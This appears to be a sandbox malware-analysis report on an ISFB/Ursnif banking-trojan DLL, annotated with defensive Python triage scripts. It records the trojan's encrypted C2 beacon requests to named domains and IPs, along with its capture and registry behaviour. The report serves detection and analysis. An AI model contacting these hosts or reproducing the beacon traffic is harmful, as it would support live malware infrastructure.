Source: global traffic HTTP traffic detected: GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
Source: global traffic HTTP traffic detected: GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187
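Added example (editor's code, not part of the sandbox report or of the sample): a Python triage routine for the request lines above. ISFB/Ursnif builds its C2 URI by Serpent-encrypting the request, base64-encoding it, replacing `+`, `/` and `=` with `_2B`, `_2F` and `_3D`, appending a fake file extension and then inserting `/` at random positions; the routine reverses that to recover the ciphertext and uses its 16-byte block alignment as a sanity check (all requests above decode to 176 bytes, eleven Serpent blocks). It also collects the other signals visible in this section: a literal IP in Host, which is why the report logs "TCP traffic detected without corresponding DNS query" for 194.76.226.200 and 31.214.157.187, the fabricated MSIE 8.0/Windows NT 10.0 User-Agent, and the no-cache headers. The prefix `/drew/` and extension `.jlk` are taken from this sample; the Serpent key is in the bot's configuration and not on this page, so decoding stops at the ciphertext. Two caveats the report does not spell out: the inserted slashes can split a token (`_/2F` and `_2/B` both occur above), so slashes must be stripped before the tokens are reversed, and the nginx 404s above only mean the C2 handler rejected those requests at that moment, not that the servers are down (they answered).

```python
"""Added example: triage of the ISFB/Ursnif C2 requests listed above."""
import base64
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed input: three request lines copied from the report above, in the
# sandbox's own rendering (the CRLFs between headers are stripped, so the
# header fields run together on one line).
REQUESTS = [
    "GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200",
    "GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at",
    "GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200",
]

URI_PREFIX = "/drew/"   # URI prefix seen in this sample's requests
# ISFB base64-encodes the Serpent ciphertext, then replaces + / = with tokens.
SUBSTITUTIONS = (("_2B", "+"), ("_2F", "/"), ("_3D", "="))
SERPENT_BLOCK = 16      # ISFB encrypts the request body with Serpent-CBC


def normalize_isfb_uri(path: str, prefix: str = URI_PREFIX) -> bytes:
    """Undo the ISFB URI encoding and return the raw ciphertext.

    The bot builds the URI as: encrypt -> base64 -> substitute + / = ->
    append a fake file extension -> insert '/' at random positions. The
    inserted slashes can split a token ('_/2F' and '_2/B' both occur in the
    requests above), so slashes must be removed before the tokens are
    reversed. The '=' padding is absent in these requests, so it is restored.
    The Serpent key lives in the bot's configuration and is not on this page,
    so decoding stops at the ciphertext.
    """
    if not path.startswith(prefix):
        raise ValueError(f"path does not start with {prefix!r}")
    body = path[len(prefix):]
    body = body.rsplit(".", 1)[0]      # drop the fake extension (.jlk here)
    body = body.replace("/", "")       # remove the inserted slashes FIRST
    for token, char in SUBSTITUTIONS:
        body = body.replace(token, char)
    body += "=" * (-len(body) % 4)     # restore stripped base64 padding
    return base64.b64decode(body, validate=True)  # binascii.Error is a ValueError


@dataclass
class Verdict:
    host: str
    bare_ip: bool
    user_agent: str
    cipher_len: int
    block_aligned: bool
    reasons: list = field(default_factory=list)


def triage(line: str) -> Verdict:
    """Parse one sandbox-rendered request line and collect ISFB indicators."""
    m = re.match(r"GET (\S+) HTTP/1\.[01](.*)$", line)
    if not m:
        raise ValueError("not a GET request line")
    path, headers = m.group(1), m.group(2)
    host = re.search(r"Host: (\S+)$", headers).group(1)
    user_agent = re.search(r"User-Agent: (.*?)Host: ", headers).group(1)
    reasons = []

    try:                                # a literal IP is why the report logs
        ipaddress.ip_address(host)      # "TCP traffic without corresponding DNS query"
        bare_ip = True
        reasons.append("Host is a literal IP; no DNS lookup precedes the connection")
    except ValueError:
        bare_ip = False

    # IE 8 never shipped on Windows 10, so this User-Agent pairing is fabricated.
    if "MSIE 8.0" in user_agent and "Windows NT 10.0" in user_agent:
        reasons.append("implausible User-Agent: MSIE 8.0 on Windows NT 10.0")
    if "Cache-Control: no-cache" in headers and "Pragma: no-cache" in headers:
        reasons.append("no-cache headers on a GET for a static-looking file")

    try:
        ciphertext = normalize_isfb_uri(path)
    except ValueError:
        ciphertext = b""
    aligned = bool(ciphertext) and len(ciphertext) % SERPENT_BLOCK == 0
    if aligned:
        reasons.append(f"URI decodes to {len(ciphertext)} bytes, a whole number of Serpent blocks")
    return Verdict(host, bare_ip, user_agent, len(ciphertext), aligned, reasons)


if __name__ == "__main__":
    for line in REQUESTS:
        v = triage(line)
        print(f"{v.host}: {v.cipher_len} bytes; " + "; ".join(v.reasons))
```

The block alignment check is the part worth keeping in a detection pipeline: a random-looking path that decodes to a multiple of 16 bytes after the token reversal is a much stronger signal than the `/drew/` prefix or the `.jlk` extension, both of which are per-campaign configuration and change between builds.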

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E33B10 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 3_2_00E33B10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E34154 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 3_2_00E34154
Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00730108 GetProcessUIContextInformation,GetRawInputData,GetSystemMenu,Sleep,GetUserObjectInformationW,GetWindowBand,GetWindowCompositionAttribute,GetWindowFeedbackSetting,GetWindowMinimizeRect,ImpersonateDdeClientWindow,GetMenuBarInfo,InitializeInputDeviceInjection,GetMenuBarInfo,InitializePointerDeviceInjectionEx,InjectDeviceInput,InjectGenericHidInput, 0_2_00730108
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E57B64 GetKeyboardState, 3_2_00E57B64

E-Banking Fraud

Source: Yara match File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: hFGZpat9Mf.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007284AC CheckMenuItem,ExitWindowsEx, 0_2_007284AC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076B448 0_2_0076B448
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E7B448 3_2_00E7B448
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E41FAC 3_2_00E41FAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_01082244 3_2_01082244
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00ED17C8 3_2_00ED17C8
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 007064B8 appears 164 times
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 00706408 appears 48 times
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 00704068 appears 47 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00E16408 appears 48 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00E164B8 appears 164 times
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A41C NtdllDefWindowProc_A, 0_2_0072A41C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0074A9F4 NtdllDefWindowProc_A,GetCapture, 0_2_0074A9F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E3A41C NtdllDefWindowProc_A, 3_2_00E3A41C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E5A9F4 NtdllDefWindowProc_A,GetCapture, 3_2_00E5A9F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_010814BA SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 3_2_010814BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_01082465 NtQueryVirtualMemory, 3_2_01082465
Source: hFGZpat9Mf.dll Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll (164 identical entries)
fadfadfadad.dll is not a module that exists on a stock Windows install. 164 load attempts of a name that cannot resolve is worth checking in the API trace: whether each call fails as expected (a load of a non-existent module is one way code tests whether the loader is hooked) or whether the sandbox satisfied it. The report gives no resolution for these loads, so this stays an item to verify rather than a conclusion.
Source: hFGZpat9Mf.dll Virustotal: Detection: 20%
Source: hFGZpat9Mf.dll ReversingLabs: Detection: 32%
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
This is the per-user Software Restriction Policies key. The Windows Safer API in advapi32 reads it whenever a process is created or an image is loaded, so the access is loader behaviour shared with benign programs and should not be read as the sample probing for policy.
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
loaddll32.exe is the analysis harness, not part of the sample: it runs cmd.exe /C rundll32.exe <dll>,#1 to call the DLL's first export by ordinal, so the "Suspicious Call by Ordinal" Sigma hit in the overview is raised on the harness's command line, not on anything the sample itself launched. In the wild the DLL arrives through whatever delivery chain drops it, and that parent is what a detection should key on. The rundll32.exe instance (PID 3272, from the -p argument) then crashed and was handed to WerFault.exe, which is the "One or more processes crash" signature; the WER temp file and the WERReportingForProcess3272 mutant further down are WerFault's own artifacts, not the sample's.
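A small triage script for the process-creation lines above, added here as an example and not part of the Joe Sandbox report: it rebuilds the parent chain from the four report lines (copied verbatim), flags rundll32.exe processes whose own command line calls an export by ordinal, and reports whether the chain starts at the analysis harness. The harness image names and the constructed explorer.exe contrast line are assumptions for illustration.

```python
import re

# Constructed input: the four "Process created" lines of this report, copied verbatim.
PROCESS_LINES = [l.strip() for l in r"""
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
""".strip().splitlines()]

# Constructed contrast case (not from the report): the same kind of ordinal call launched by explorer.exe.
NON_HARNESS_LINES = [
    r'Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\Temp\x.dll,#2',
]

LINE_RE = re.compile(r"^Source: (?P<parent>\S+) Process created: (?P<image>\S+) (?P<cmdline>.+)$")
# rundll32 <dll>,#<n>: an export called by ordinal rather than by name.
ORDINAL_RE = re.compile(r'rundll32(?:\.exe)?\s+(?:"[^"]+"|\S+?),#(?P<ordinal>\d+)', re.IGNORECASE)
# Assumption: images whose presence in the chain marks it as sandbox instrumentation, not sample behaviour.
HARNESS_IMAGES = {"loaddll32.exe", "loaddll64.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_tree(lines):
    """Map image path -> parent image path and image path -> command line.

    Keyed by image path, which is unique for the report lines used here (an
    assumption; a real process log would key by PID)."""
    parent_of, cmdline_of = {}, {}
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            parent_of[m["image"]] = m["parent"]
            cmdline_of[m["image"]] = m["cmdline"]
    return parent_of, cmdline_of


def ancestry(image, parent_of):
    """Basenames from the process up to the root; 'unknown' or a missing parent ends the walk."""
    chain = [basename(image)]
    while (parent := parent_of.get(image)) not in (None, "unknown"):
        chain.append(basename(parent))
        image = parent
    return chain


def find_ordinal_calls(lines):
    """Flag rundll32.exe processes whose own command line calls an export by ordinal."""
    parent_of, cmdline_of = parse_tree(lines)
    findings = []
    for image, cmdline in cmdline_of.items():
        if basename(image) != "rundll32.exe":
            continue  # cmd.exe quotes the same string; only the rundll32 process itself counts
        m = ORDINAL_RE.search(cmdline)
        if not m:
            continue
        chain = ancestry(image, parent_of)
        findings.append({
            "ordinal": int(m["ordinal"]),
            "ancestry": chain,
            "from_harness": any(name in HARNESS_IMAGES for name in chain),
        })
    return findings


if __name__ == "__main__":
    for finding in find_ordinal_calls(PROCESS_LINES) + find_ordinal_calls(NON_HARNESS_LINES):
        print(finding)
```

Matching only processes whose image is rundll32.exe is deliberate: the cmd.exe line carries the same `,#1` text in its command line, and a rule that matches on the command line alone fires twice for one launch.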
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
{4590F811-1D3A-11D0-891F-00AA004B2E24} is CLSID_WbemLocator, the WMI client entry point. The lookup under WOW6432Node is a 32-bit process resolving the 32-bit COM registration, and this instantiation is what backs the WMI registry signatures in the overview.
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER410A.tmp
Source: classification engine Classification label: mal100.troj.evad.winDLL@6/6@4/7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00708912 GetDiskFreeSpaceA, 0_2_00708912
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007210CC GetLastError,FormatMessageA, 0_2_007210CC
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
The Delphi run-time library reads this key at start-up to locate a localized resource module. Seeing it in both processes means the outer DLL is Delphi-compiled, which matters for reading the push/ret findings under Data Obfuscation below: several of those are Delphi code-generation idioms rather than hand-written obfuscation.
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3272
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00716C2C FindResourceA, 0_2_00716C2C
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Any process that resolves host names can touch the hosts file. The WerFault.exe read belongs to crash-report upload and is benign; the loaddll32.exe read is the one to correlate with the sample's DNS and HTTP traffic.
